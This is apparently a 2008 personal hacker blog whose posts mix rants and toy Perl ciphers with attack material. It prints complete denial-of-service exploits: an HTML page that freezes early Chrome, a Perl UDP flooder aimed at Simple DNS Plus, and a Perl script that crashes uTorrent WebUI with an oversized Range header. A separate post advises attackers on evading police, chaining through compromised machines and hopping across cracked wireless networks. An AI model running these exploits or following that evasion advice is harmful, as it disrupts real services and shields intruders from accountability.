BlackHat - Hacking / Cracking / Revese Engneering / Programming

The TorSwitch.pm module

Exodus — Sat, 04 Oct 2008 21:45:10 +0000

TorSwitch is basiclly a wrap around Tor module which i wrote in order to make
my life easier while automating some of my mayhem ;).
it could be use for those who want to combain their scripts with Tor anonymity
plus the ability to auto switch Tor’s circuit chain while automating somthing
this module is able to use both HTTP/S proxy(Privoxy) and Tor’s native SOCKS
protocol in order to transfer data.
this module is in its early stages and some modifications has to be made
but i’m too lazy at the moment.
anyway its only a wrap-around module, so if you find it useful
Enjoy

Tar: TorSwitch-0.3.tar

Ready, set, chrome!

Exodus — Mon, 08 Sep 2008 14:01:11 +0000

Google’s has lunched their new browser called Chrome in its very early BETA version(0.2.149.27)
and ofcourse everyone is on the race for 0day exploits. So far only few vulnerability has been found most of them are low severity exploits and non of them are a real use for massive 0wnage or somthing
so i thought i’ll give it a try and so far i’ve came up with another kinda useless exploit
i’ve found that Chrome is having a hard time rendering a oversized title attribute causing it to
- freeze under Vista SP1.
- crash in some cases under Windows XP SP1/SP2.

Exploit:

–
Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit
Exploit written by Exodus.
http://www.blackhat.org.il
http://www.blackhat.org.il/index.php/ready-set-chrome/
http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
–>
<HTML>
<HEAD>
<TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploitTITLE>
<SCRIPT language="JavaScript">
function buff(len)
{
var buffer;
for(var i = 0; i != len; i++)
{ buffer += 'E';}
return buffer;
}
SCRIPT>
HEAD>
<SCRIPT>
document.write('\”' + buff(31337) + '\”>');
SCRIPT>
BODY>
HTML>

The Whitehats, Blackhat conference in Vegas?

Exodus — Sat, 09 Aug 2008 14:20:00 +0000

lately i’ve been wondering about this so called “Blackhat” conference which is
talking place once in every couple of years.
this year the conference took place in Vegas at the 2-7 of August.
and of course as expected all the big names of the security industry showed up,
but whats really bothering me is that this conference is no more the land of the hackers
those individuals who came because of their thirst for knowledge the desire to understand
and research technology on all of its aspects and to share/exchange their knowledge.
the truth is that this kind of conferences are filled with people
with the desire to make more money and drive more attention to their sponsering
company/product. this is no more the hackers blackhat conference but a whitehat
conference filled with security researchers.

Thoughts of the perfect hack!

Exodus — Thu, 07 Aug 2008 14:48:03 +0000

Definition of a perfect hack:
So, what exactly is a perfect hack?, well my definition is a clean in, taking whatever
you came for, and taking off without having anyone notice, without leaving tracks
as if it never happend.

The real world:
ofcourse in the real world this scenerio wont always be possible, for couple
of reasons; it might just be that the goal of your hack has distructive intention,
like distroying some framing data or spread some malicious creature inside a
network for whatever reason and it is very clear that someone would eventually
notice.

another possibility is some inescapable detecting system monitoring every bit in
the traffic flow and even if we use some methods of steganography/cryptography
to camouflage our doings if the person behind the monitor is good, and knows what
he is doing, he will notice your activity

Always keep in mind:
No matter what we do or how we do it, the first and the most important rule is
Rule #1: Do not get caught!.
therefore if we follow rule #1 at the top of everything we need to be Untracable,
even if we will get noticed somewhere in the process. considering today’s recources,
and the ability of the local police/agencies it is very possible to trigger such an
untracable hack. (note that nothing/no one is perfect so take the term untracable
in proportion)

Annonimity fundamental:
some fundamental methods of annonimity, is to never leave obvious tracks such
as your handle, e-mail address and even arrogant qoute/message or any other
human-ego tracks that could eventually lead them to you, never talk about your
hack before or after you do it ,in other words dont make too much “noise on the line”.
another thing is not to use direct connection between you and the target, for this
cause it is very usefull to use a SOCKS/HTTP/Tor(if you trust it) services on some
compromised box or even chain couple of proxys that would leverege your annonimity.
all those suggestions are known stuff, and if you’re planning a real hack and not some
stupid web defacment you should know them.
ofcourse the are way more elements of annonimity but i aint gonna list them all here.
the problem here is that virtually sitting behind couple of boxs is still not safe
enough for you and if the people that are going after you are good, it is very
possible that they will track you down.

Wireless Hop’ing Attack(WHA):
in the past everything was wired with cables and if you want to be conncted
to some network you had to be somehow physically wired to it. this reallty has
changed, nowdays the internet is flowing on the back of wireless networks in
almost every settled civilization, networks are transmiting/receiving bits over the
air. in my country almost every house has a wireless networks and most of them
arent really secured for user comfortability reasons,
and those that are secured with encrypted transformation(WEP/WPA) can be
broken within minutes or hours.
in addition most of those networks router are protected with default password
which is a great start if you wanna compromise some computers in that network
as well. now lets say you have a target and you already know your way into
this specific system, you just need to make sure no one could ever trace you.

So you go out for a war driving trip. looking at the great view, maybe even at
some walk-on-by chicks, while slowly breathing those great wireless bits of
information that flows around us. maybe even logically XOR’ing AND’ing
(OR’ing NOT’ing) some of them in your head just for the fun of it.
now lets do what we came for to do and thats collecting location of
open/insecure(hackable) wireless networks, except that the goal of this
wardriving isnt really the chicks or wireless networks themselfs,but searching
for a suitable networks to play as a gatway to your target system over the internet.

after you have mapped couple of suitable networks you’re ready to prepare
the sourface for your hack/attack some may want to compromise computers
on that network other may just want to use it as one of the hops for their hack
eventually if you trigger that
hack using your annonimity methods plus hoping between wireless networks no matter
what resources the agencies/police has it is extermly hard to trace such an attacker

What do they know?:
from my experince, in israel i assume that the police has the ability to use the needed
resource but they just dont know how to manipulate those resources in order to
track hackers another reason is that the police is lacking of a good technical people
who deals with computers & security and therefore they are hopeless while facing
against real hackers and attacks and because of that they prefer picking onto those
lame kids thatdeface poor websites and leaveing their handles or/and e-mail address
those are screaming for attention, and they are so easy to track so once in a while
the police are showing off with this new Mega hacker that they caught.

Worst case scenario:
if we will take the worst case scenario of a CERT agency that has uberian resources
monitoring/tracking tools over the IIX(backbone) that logs everything
(which is kinda crazy since you gotta log tons of Terabyes every single second)
with the ability to crossbreed every piece of information in any given time
even with such power, if they wont trace you while your in action,
it might just be that they will never be able to find you. even if you weren’t 100%
precent carefull(which is mostly probable) all they can end up with is just
some hacked system and a MAC address of some wireless network adapter.

upcoming OWASP

Exodus — Wed, 06 Aug 2008 12:39:41 +0000

I’ve decided to change a bit the look of BlackHat to make it more human-readable.
so people wont die trying to read the text over the black background.

in addition, the upcoming israeli (shame) conference called OWASP “Security” will take place at August 14
probably the quality of the talks wont even come close to those in Blackhat/Defcon since most of the people there arent hackers(-people who live/breathe/research computers & techlology) , but miserable Web Application penetration testers who entered the security area because of the easy money.
dispite all of this, i’m going to attend this con’ for three main reasons:
1. i dont have anything better to do
2. hey, its a free pizza after all
3. i can use a good laugh.

Xigenere cypher

Exodus — Fri, 18 Jul 2008 00:40:23 +0000

another old implementation of vigenere encryption combained with logical xor operator.

# Xignere:

## this script is an implementation of vignere encryption
### underlying xor logical operator mutated into Xignere (was bored)
#### useage: Xigenere-v1.0
<-e|-d>
if(@ARGV < 3)
{ &usage; }
if($ARGV[2] eq "-e")
{
$fileCont = loadFile($ARGV[0]);
$crypt = xigenereCrypt($fileCont,$ARGV[1]);
open(FILE,">$ARGV[0]");
print FILE $crypt;
print "Encryption completed, results saved to $ARGV[0]\n";
}
elsif($ARGV[2] eq "-d")
{
$fileCont = loadFile($ARGV[0]);
$decrypt = xigenereDecrypt($fileCont,$ARGV[1]);
open(FILE,">$ARGV[0]");
print FILE $decrypt;
print "Decryption completed, results saved to $ARGV[0]\n";
}
else
{ &usage; }
sub xigenereCrypt
{
($text,$key) = @_;
$textLen = length($text);
for($i = 0; $i < $textLen; $i++)
{
$k=0 if($k == length($key));
$ord = ord(substr($text,$i,1)) + ord(substr($key,$k,1));
$ord -= 255 if ($ord > 255);
$crypted .= chr($ord) xor substr($key,$k,1);
$k++;
}
return $crypted;
}
sub xigenereDecrypt
{
($text,$key) = @_;
$textLen = length($text);
for($i = 0; $i < $textLen; $i++){
$k=0 if($k == length($key));
$ord = ord(substr($text,$i,1)) - ord(substr($key,$k,1));
$ord += 255 if ($ord < 0);
$decrypted .= chr($ord) xor substr($key,$k,1);;
$k++;
}
return $decrypted;
}
sub loadFile
{
open(FILE,shift);
while($line = ) {
$content .= $line;
}
return $content;
}
sub usage
{
print "Usage:
<-e|-d>";
exit;
}

Simple DNS Plus 5.0/4.1 remote Denial of Service exploit

Exodus — Sat, 12 Jul 2008 16:36:36 +0000

after reading the story about Dan kaminskys DNS cache posioning attack
and watching his ridiculous youtube cornflakes commercial
i decided to trace the source of this vulnerability.
so in order to understand how kaminsky attack is any diffrent from the traditional dns cache posioning
i started digging into some RFCs/documentations and playing with the protocol
to see if i can find some clues/logical faults.
yet i didnt find anything worthy and i wonder if kaminsky founding is just some algorithm of guessing a little bit faster the 16 bit transaction ID field

anyway while i was doing some tests on this Simple DNS server
i’ve found that if i repeatingly send DNS server response packets as if i was a root dns server
to the client port of the DNS server it will remotly cause a denial of service.

so what we have here is a DNS response packet built from scratch
that basicly flood the the source port of some “Simple DNS server Plus” and deny its service.
p.s: i used mutiple pack functions to make it more convenient
i could have just squeeze it into one pack but what the heck..

#!/usr/bin/perl
# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
#
# usage: sdns-dos.pl
# Exploit written by Exodus.
# http://www.blackhat.org.il
use IO::Socket;
if(@ARGV < 3){
print("sdns-dos.pl ");
}
$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");
$address = $ARGV[0];
$trans = pack("H4","1337");
$flags = pack("B16","1000010110110000");
$question = pack("H4","0001");
$answerRR = pack("H4","0001");
$authorityRR = pack("H4","0000");
$additionlRR = pack("H4","0000");
$type = pack("H4","0001"); # A host name
$class = pack("H4","0001"); # IN
@parts = split(/\./,$address);
foreach $part (@parts)
{
$packedlen = pack("H2",sprintf("%02x",length($part)));
$address2 .= $packedlen.$part;
}
$query = $address2. "\000" . $type . $class;
$aname = pack("H4","c00c");
$atype = pack("H4","0001");
$aclass = pack("H4","0001");
$ttl = pack("H8","0000008d");
$dlen = pack("H4","0004");
$addr = inet_aton("127.0.0.1");
$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;
$payload = $trans . $flags . $question . $answerRR
. $authorityRR . $additionlRR . $query . $answer;
print "sending $ARGV[2] packets… ";
for($i=0;$i<=$ARGV[2];$i++)
{
print $sock $payload;
}
print "Done. Good bye.";
__END__

uTorrent / BitTorrent WebIU 1.7.7/6.0.1 Range header Denial of Service exploit

Exodus — Mon, 23 Jun 2008 19:06:42 +0000

Today i kinda got really bored, so i’ve decided to dig into some advisories and see what i can find
during my search i’ve found the following advisory
and since i didnt have anything better to do and it doesnt require much of a thinking
i came up with the following exploit:

#!/usr/bin/perl
# uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl
# Exploit written by Exodus.
# http://www.blackhat.org.il
use IO::Socket;
use MIME::Base64;
if(@ARGV < 3)
{ &usage; }
($host,$ref) = split(/\//,$ARGV[0]);
$sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
$buff = "E" x 60000;
$up = encode_base64($ARGV[2]);
chomp($up);
print $sock "GET /gui/common.js HTTP/1.1\r\n".
"Host: $host\r\n".
"Authorization: Basic $up\r\n".
"Range: bytes=$buff\r\n".
"Connection: close\r\n\r\n";
close($sock);
print "[!]Payload sent, WebUI should be down…\n";
sub usage
{
print "usage $0 \n".
"ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
exit;
}

Desert Scroll cypher

Exodus — Sun, 22 Jun 2008 16:22:48 +0000

1. Overview:
Desert Scroll is an old project of mine which i wrote in perl couple of years ago
and basicly its an implementation of a Book encryption

2. How does it work:

2.1. Loading && Mapping the key file:
at first before every encryption/decryption of plain text a key is being loaded into the memory of the script/program and then mapped into a bi-dimensional array while the first dimension is used to map all ASCII numeric values that exists in the key and in the second dimension there are all the offsets of the same ASCII value which exists in the key file

2.2.Encrypting process:
the process of the encryption is basicly a replacment of the original characters in the plaintext with the one of the offsets which lays under that ASCII value in the array
its worth mentioning that no addition steps has been taken to camouflage and prevent from the third side to understand the mechanisem of this encryption

perl Desert_Scroll-v1.0-recode.pl dec.txt mentor_crpyt.txt http://www.blackhat.org.il/uploads/hackermanifesto.txt -e
836 1465 431 2199 253 848 1539 358 566 1350 733 25 930 1689 1009 2759 1645 1357 2695
143 469 278 395 74 106 2954 2661 3127 87 2775 922 2207 1876 2637 1794 2279 3098 103
48 801 1394 1190 1497 2055 3123 773 3140

2.3.Decrypting process:
the decrypting process is fairly simple the script replace every offest number with its identical value from the key map.

perl Desert_Scroll-v1.0-recode.pl mentor_crpyt.txt mentor_dec.txt http://www.morcant.net/data/docs/Misc/hackermanifesto.txt -d
"imagination is more important than knowledge" - Albert Einstein

3.Notes:
- the code was written long time ago and if i’d be recoding it today i’m sure it could have been more efficient and optimized.
- some of the comments in the brief of the source code are a bit silly so you are more than welcome to ignore them.

use LWP::Simple;

system('cls');
print qq~;—————————————————————————–;
;Desert Scroll v1.0: Exodus/nullfield\@gmail.com;
;—————————————————————————–;
[!]INPUT: Desert_Scroll-v1.0-recode.pl $ARGV[0] $ARGV[1] $ARGV[2] $ARGV[3]
~;
if(@ARGV==1 && @ARGV[0] eq "-h")
{
print qq~
DS is a encoding/decoding tool implementing the so called book-encryption
and almost uncrackable unless using the right key. what makes this
encryption so uniqe is that the key could be almost anything from the very
"Declaration of Independence" to the Mentors "The Conscience of a Hacker"
paper.
this means that two sides could first decide on a key-text which could be
some famous paper on god knows what and after then they could start swiching
messages without any concerns that a third side factor would disturb and
decode their data.
another note that must be mentioned is that the bigger in size the key is the
stronger and tougher to crack the encryption is. however
there is still one basic disadvantage in this encryption, in order to encode
any ascii value the key must contain it somewhere in it or else it wont get
encoded or in order words some of the data will get lost
therefore it is better to use a large texts which would contain atleast the
most important ascii values to ensure a valid flow of encoded data.
DS also contains a key generator that ensures a strong and valid encryption
Use:
the defination of the arguments of the encoder/decoder routines is using the
following syntax:
perl Desert_Scroll-v1.0-recode.pl <-e/-d>
<-e/-d> -> -e to encode, -d to decode.
-> source text to encode/decode or a qouted text.
-> destenation to output the resaults.
-> I. a pointer to the key file
II. an interger to generate a key
III. an URL pointing on the key source(format: http://…)
You can also use the key-generator stand-alone features by using the
following synatx:
perl Desert_Scroll-v1.0-recode.pl <-g>
-> key length.
-> Destenation of the key file.
~;}
elsif(@ARGV[0] eq "-g")
{
if(@ARGV!=3)
{
print qq~
[!]in order to use the key generator function you must follow this syntax:
[!] perl Desert_Scroll-v1.0-recode.pl -g
[!] -> key length.
[!] -> Destenation of the key file.
~;
exit;
}
print "\n[V]Generating key…\n";
$key=key_gen(@ARGV[1]);
print "[V]Key is being saved to @ARGV[2].\n";
save_file(@ARGV[2],$key);
print "[V]Key generation completed.\n";
}
elsif(@ARGV!=3)
{
print qq~
[!]DS is using the following syntax:
[!]Use: perl Desert_Scroll-v1.0-recode.pl <-e/-d>
[!]type "perl Desert_Scroll-v1.0-recode.pl -h" for fully specifications about DS.
~;
}
if(@ARGV[3] eq "-e")
{
$file=file_content(@ARGV[0]);
$key=file_content(@ARGV[2]);
if(!$file)
{print"[!]Couldnt open source file therefore argument treated like a string.\n";}
$key_string=@ARGV[2];
if($key_string=~/http\:\/\//)
{
print "[!]Downloading the key from: $key_string\n";
$key=get($key_string);
}
elsif($key=file_content($key_string))
{ print "[!]Opening the source of the key file.\n"; }
else
{
print "[!]Couldnt open Key-file therfore argument treated like a length interger.\n";
$key=key_gen($key_string);
save_file("[key]".@ARGV[0],$key);
print "[!]New Generated key has been saved to \"[key]@ARGV[0]\"\n";
}
key_map($key);
print "[V]Key mapped successfully in memory.\n";
save_file(@ARGV[1],encode($file));
print "[V]Encoded file is saved to \"@ARGV[1]\".\n";
print "[V]Encoding complete.\n";
close(DEST);
$e=;
}
elsif(@ARGV[3] eq "-d")
{
$file=file_content(@ARGV[0]);
$key=file_content(@ARGV[2]);
if(!$file)
{print"[!]Couldnt open source file therefore argument treated like a string.\n"; }
if(@ARGV[2]=~/http\:\/\//)
{
print "[!]Downloading the key from: @ARGV[2]\n";
$key=get(@ARGV[2]);
}
elsif(!$key)
{ print "[X]Could'nt Open the source key file, decoding process failed.\n";exit;}
print "[!]Opening the source of the key file.\n";
save_file(@ARGV[1],decode($file,$key));
print "[V]Decoded file is saved to \"@ARGV[1]\".\n";
print "[V]Decoding complete.\n";
close(DEST);
$e=;
}
sub file_content()
{
my $content,$line;
my ($source)=@_;
open(FILE_CON,$source) || return 0;
while($line=) {$content.=$line;}
close(FILE_CON);
return $content;
}
sub save_file()
{
my ($dest,$content)=@_;
if(!open(FILE_SAV,">$dest"))
{ print("[X]Unable to open the file.\n"); }
print FILE_SAV $content;
close(FILE_SAV);
}
sub key_gen()
{
my ($len)=@_;
for($i=0; $i<=$len;$i++)
{
$keytext.=$rnd_char=chr(rand(255));
}
return $keytext;
}
sub encode
{
my ($content)=@_;
$len=length($content);
for($i=0;$i<=$len;$i++) # foreach letter
{
$num=ord(substr($content,$i,1));
if(@{$map[$num]})
{
$rand_var_alloc = $map[$num][int(rand(scalar(@{$map[$num]})))];
$encoded.="$rand_var_alloc ";
}
else { print "[X]the ASCII value $num doesnt exist in the key this might cause data loss..\n";}
}
return $encoded;
}
sub decode
{
my @encoded,$num,$letter,$decoded;
my ($content,$key_src)=@_;
@encoded = split(/ /,$content);
foreach $num (@encoded)
{
$letter = substr($key_src,$num,1);
$decoded .= $letter;
}
return $decoded
}
sub key_map
{
my ($content)=@_;
my $num,$i;
for($i=0;$i<=length($content);$i++)
{
$num=ord(substr($content,$i,1));
push(@{$map[$num]},$i);
}
return(1);
}

Mission abort!

Exodus — Sun, 22 Jun 2008 13:27:57 +0000

So they had to drag me all the way down south just to tell me that its okay and i can pass on the military training… its not that i’m not happy about it but for fuck sakes!, i drove 4 hours today because they couldnt just decide sucha simple thing before the recruiting me.

so anyway if i’m looking at the bright side of it, i’ve just got a day off from work
which is more free for me!, the question is what do i do with it..